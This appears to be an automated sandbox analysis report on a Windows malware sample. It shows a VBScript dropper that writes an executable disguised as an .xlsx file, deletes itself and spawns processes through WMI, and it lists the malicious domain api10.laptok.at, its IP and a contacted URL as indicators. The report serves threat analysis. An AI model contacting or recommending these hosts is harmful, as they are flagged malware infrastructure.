Architecture: WINDOWS
Score: 100

Signatures attached to the sample node: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 2 other signatures

Process tree as shown in the graph:
  wscript.exe (started)
    dropped: C:\Users\user\AppData\...\occurrent.xlsx, PE32
    dropped: C:\Users\user\AppData\Local\Temp\bucket.zip, Zip
    signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Deletes itself after installation; Creates processes via WMI
  iexplore.exe (started)
    iexplore.exe (started)
      network: api10.laptok.at 47.241.19.44, ports 49783, 49784, 80, CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, United States

Contacted Public IPs

IP            Domain   Country        ASN    ASN Name                                          Malicious
47.241.19.44  unknown  United States  45102  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC  true

Contacted Domains

Name             IP            Active
api10.laptok.at  47.241.19.44  true

Contacted URLs

Name                                Malicious  Antivirus Detection                      Reputation
http://api10.laptok.at/favicon.ico  true       13%, Virustotal; Avira URL Cloud: safe  unknown